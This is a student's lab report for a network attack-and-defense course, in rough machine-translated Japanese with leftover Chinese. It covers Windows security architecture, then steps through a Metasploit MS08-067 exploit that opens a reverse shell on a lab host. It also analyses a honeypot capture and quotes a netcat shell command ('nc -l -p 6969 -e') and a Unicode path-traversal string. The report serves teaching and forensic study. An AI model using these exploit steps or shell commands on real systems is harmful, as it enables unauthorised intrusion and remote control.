20199128 2019-2020-2「ネットワーク攻撃と防御の実践」第7週の割り当て
| この課題はどのコースに属していますか | 「ネットワーク攻撃と防御の実践」 |
| この課題の要件は何ですか | 「ネットワーク攻撃と防御実践」の第7週 |
| この割り当ての特定の側面が私の目標を達成するのに役立った | Windows OSのセキュリティ攻撃と防御の知識を学ぶ |
| 宿題... | 本文を見る |
| その他の参考文献 | 参考文献を見る |
1.練習内容
1. Windowsオペレーティングシステムの基本的なフレームワーク
- 基本構造:プロセッサの特権モードで実行されるオペレーティングシステムカーネルと、プロセッサの非特権モードで実行されるユーザー空間コードに分かれています。前者には、Windowsエグゼクティブボディ、Windowsカーネルボディ、デバイスドライバー、ハードウェアアブストラクションレイヤー、Windowsウィンドウ、およびグラフィカルインターフェイスインターフェイスのカーネル実装コードが含まれ、後者には、システムサポートプロセス、環境サブシステムサービスプロセス、サービスプロセス、ユーザーアプリケーションソフトウェア、コアサブシステムDLL。
- Windowsプロセスおよびスレッド管理メカニズム:実行可能プログラムがWindowsシステムで実行される場合、プロセスはコンテナーと見なされます。このプロセスには、仮想メモリ空間記述子、システムリソースオブジェクトハンドルのリスト、セキュリティアクセストークン、および実行スレッドが含まれます。スレッドは、Windowsシステムでの命令実行のための特定のキャリアとして使用されます。そのスレッド制御ブロックTCBには、プログラム実行のコンテキスト情報などが含まれ、プロセスの仮想アドレス空間、リソースリスト、セキュリティアクセストークンを共有します。
- Windowsメモリ管理メカニズム:仮想メモリは、システムコアメモリ間隔とユーザーメモリ間隔に分かれています。ユーザーモードプログラムは、前者に直接アクセスできません。
- Windowsファイル管理メカニズム:NTFSファイルシステムが採用され、実行可能ファイルはPE形式です。
- Windowsレジストリ管理メカニズム:これは、システムのグローバル構成、ユーザー、およびアプリケーションソフトウェアの構成情報を格納するストレージウェアハウスです。
- Windowsネットワークメカニズム:ネットワークカードハードウェアデバイスドライバー(物理層)、NDISライブラリとミニポートドライバー(リンク層)、TDI(トランスポート層)、ネットワークAPI DLLとTDIクライアント(セッション層とプレゼンテーション層)、ネットワークアプリケーションそしてサービスプロセス(アプリケーション層)。
2. Windowsオペレーティングシステムのセキュリティアーキテクチャとメカニズム
- 参照モニターモデル:システムのすべてのサブジェクトアクセスオブジェクトは、アクセスを承認する仲介者として参照モニターを使用する必要があり、すべてのアクセスレコードも監査ログを生成します。
- Windowsセキュリティアーキテクチャ:カーネルのSRMセキュリティ参照モニターとユーザーモードのLSASSセキュリティサービスは、Winlogon / NetlogonやEventlogなどのサービスと共に、対象ユーザーのID認証メカニズムとすべてのリソースオブジェクトのアクセス制御メカニズムを実装します。 、そしてアクセスのためのセキュリティ監査メカニズム。
- Windows ID認証メカニズム:Windowsは、プログラムコードを実行するセキュリティサブジェクトの実行環境としてアカウントを設定します。アカウント権限の基本的な役割は、アカウントで実行されているプログラムのアクセスをシステムリソースオブジェクトに制限することです。Windowsは、ローカルID認証とネットワークID認証の両方をサポートしています。
- Windowsの承認とアクセス制御メカニズム:参照モニターモデルに基づいて、カーネルのSRMモジュールとユーザーモードのLSASSサービスが一緒に実装され、セキュリティサブジェクトがターゲットリソースにアクセスするときに仲介としてSRMが使用され、設定されたアクセス制御リストに従って承認されたアクセスが実行されます。
- Windowsセキュリティ監査メカニズム:システム監査戦略は、システム管理者がローカルセキュリティ戦略で定義し、それらの慣行を記録するシステムを決定します。
- その他のセキュリティメカニズム:Windowsセキュリティセンター、IPsecロードおよび検証メカニズム、EPS暗号化ファイルシステム、ファイル保護メカニズム、バンドルされたIEブラウザーによって提供されるプライバシー保護、ブラウザーセキュリティ保護メカニズムなど。
3. Windowsリモートセキュリティ攻撃および防御テクノロジー
-
リモートパスワードの推測やクラッキング攻撃、Windowsネットワークサービス攻撃、Windowsクライアントおよびユーザー攻撃を含みます。
-
特定のターゲットに対する侵入テスト攻撃プロセス
-
脆弱性スキャンテスト:ターゲットシステムでスキャンテストを行い、システムに既知のセキュリティの脆弱性があるかどうかを確認します。
-
脆弱性の侵入コードを見つける:セキュリティ脆弱性情報データベースのインデックス情報に従って、セキュリティコミュニティでスキャンされたセキュリティ脆弱性の攻撃コードリソースを見つけます。
-
侵入テストの実装:侵入コードを見つけた後、侵入攻撃を実装できます。しかし、成功は、コードとターゲット環境が一致するかどうかに依存します。
-
-
Metasploit侵入テスト:metasploitには、セキュリティの脆弱性を悪用するエクスプロイトモジュール、スキャンと列挙を担当する補助モジュール、ターゲットシステムへのシェルコード(ソフトウェアの脆弱性によって実行されるコード)の埋め込みを担当するペイロードモジュール、エンコーダーの検出を回避できるモジュール、および攻撃が含まれます負荷およびさまざまなインターフェースで満たされたNopsおよびその他のモジュール。
-
Windowsリモートパスワードの推測とクラッキング攻撃
-
リモートパスワードの推測:ネットワークサービスSMBプロトコル、WMIサービス、TSリモートデスクトップターミナルサービス、MS SQLデータベースサービス、SharePointなど。このような攻撃にしばしば悩まされます。
-
リモートパスワード交換通信の盗聴とクラッキング:Windowsは、ネットワークユーザーのIDを確認するときにインターネット上で情報を交換する必要があるため、ネットワークパスワード交換通信を盗聴してクラッキングされる可能性があります。
-
予防策:
- 不要なオープンネットワークサービスを閉じてみてください。
- 特定のポートのサービスを制限するようにホストファイアウォールを構成します。
- ネットワークファイアウォールを使用して、上記のサービスへのアクセスを制限します。
- バグにパッチを適用するためにウィンドウを最新の状態に保ちます。
- 強力なパスワード戦略を策定して実装します。。
-
-
Windowsリモートサービス侵入攻撃:Windowsのデフォルトのオープンポートによって提供されるネットワークサービスは、攻撃と悪意のあるコードの拡散の主な標的です。
4. Windowsローカルセキュリティ攻撃および防御技術
-
Windowsのローカル権限昇格:制限されたユーザー権限から特権アカウントを取得しようとする攻撃テクノロジ。主にDDLインジェクションを介して、ローカルプログラムのセキュリティの脆弱性をクラックします。予防措置:ベンダーのセキュリティ警告にパッチを適用して追跡します。
-
Windowsの機密情報の盗難:Windowsシステムのパスワード暗号文抽出技術、Windowsシステムのパスワード解読技術、ユーザーの機密情報の盗難など。予防策:適切なパスワードを選択してください。
-
Windowsが消えて消える:監査機能を閉じてイベントログをクリアすることにより、侵入を覆います。予防策:バックアップログレコード。
-
Windowsリモートコントロールとバックドアプログラム:コマンドラインリモートコントロールツール、グラフィカルリモートコントロールツールなどを使用して、システムのリモートコントロールとバックドアプログラムを埋め込み、ホストの永続的な制御を維持します。予防策:バックドア検出ソフトウェア。
2.実践プロセス
タスク1:metasploitソフトウェアを使用して、Windowsでリモート侵入統計実験を行う
具体任务内容:使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击,获取目标主机的访问权
攻撃マシンkali:192.168.200.2 ターゲット
マシンWin2k:192.168.200.124
1. kaliターミナルにmsfconsoleと入力してメタスプロイトを開始します
2. ms08-067脆弱性の侵入モジュールを選択しますuse exploit/windows/smb/ms08_067_netapi
3.適切な攻撃ロードモジュールを選択しますset PAYLOAD generic/shell_reverse_tcp
4.侵入攻撃を設定します攻撃者IPとターゲットIP、set LHOST 192.168.200.2およびset RHOST 192.168.200.124
5.侵入攻撃モジュールのターゲットオペレーティングシステムプラットフォームタイプを選択しますset TARGET 0
。6。侵入攻撃を実装しますexploit
。7。成功した攻撃の検証、ipconfig
タスク2:フォレンジック分析の実践:成功したNTシステム攻撃のデコード
来自213.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106(主机名为:lab.wiretrip.net);回答下面的问题:
1、攻击者使用了什么破解工具进行攻击?
2、攻击者如何使用这个破解工具进入并控制了系统?
3、当攻击者获得系统的访问权后做了什么?
4、我们如何防止这样的攻击?
5、你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么?
1. Wiresharkが.logファイルを開きます。統計-> HTTP->リクエスト
条件ip.addr == 213.116.251.162 && ip.addr == 172.16.1.106でフィルターし、No.117パケットを見つけ、boot.iniの開始を見つけ、Unicodeエンコーディング%C0%AF
No.130とNo.140にはmsadcが含まれており、検出が進行中であることを示します。
No.149、tcpストリームをトレースすると、クエリステートメントに文字列「ADM!ROX!YOUR!WORLD」とdbq = c:\ winnt \ help \ iis \ htm \ tutorial \ btcustmr.mdbが表示されます。 、この攻撃は熱帯雨林の子犬が作成したmsadc(2).pl侵入コードによって開始されました
2. No.179の
TCPフロートラッキングで、攻撃者がNo.229のTCPフローを追跡するためにエコーユーザーjohna2k> ftpcom を入力したことを確認し、攻撃者がFTPサーバーに接続しようとして
失敗したことを
確認しました。No.1106 がFTP No.1224に接続できませんでした。tcpフローをトレースし、攻撃者が1.exe / c nc -l -p 6969 -eと入力して1.exeを実行したことを確認し
ます。3 .条件tcp.port == 6969でフィルタリングし、tcpフローをトレースすると、次の攻撃者の動作を確認できます
4。
- 不要なRDSなどのサービスを無効にします。
- ファイアウォールは、ネットワーク内のサーバーによって開始された接続をブロックします。
- 仮想ルートディレクトリをWebサーバー用の別のファイルボリュームに設定します。
- FATにはセキュリティ機能がほとんどないため、NTFSファイルシステムを使用してください。
- IIS LockdownやURLScanなどのツールを使用して、Webサーバーを強化します。
5.攻撃者は褒め言葉を見つけて残しました
タスク3:チームの対立の実践:Windowsシステムのリモート侵入攻撃と分析
攻击方使用metaploit选择漏洞进行渗透攻击,获得控制权。
防守方使用wireshark监听获得网络攻击的数据包,结合分析过程,获得攻击者IP地址、目的IP地址和端口、攻击发起时间、攻击利用漏洞、攻击使用的shellcode,以及本地执行的命令输入信息。
攻撃プロセスはタスク1に似ています。以下は、wiresharkパケットキャプチャです。
3.学習と解決策で遭遇する問題
- 質問1:MS08-067に対する攻撃の失敗
- 問題1の解決策:負荷をgeneric / shell_reverse_tcpに切り替えます
4.実践のまとめ
分析ログに大きな欠陥があります。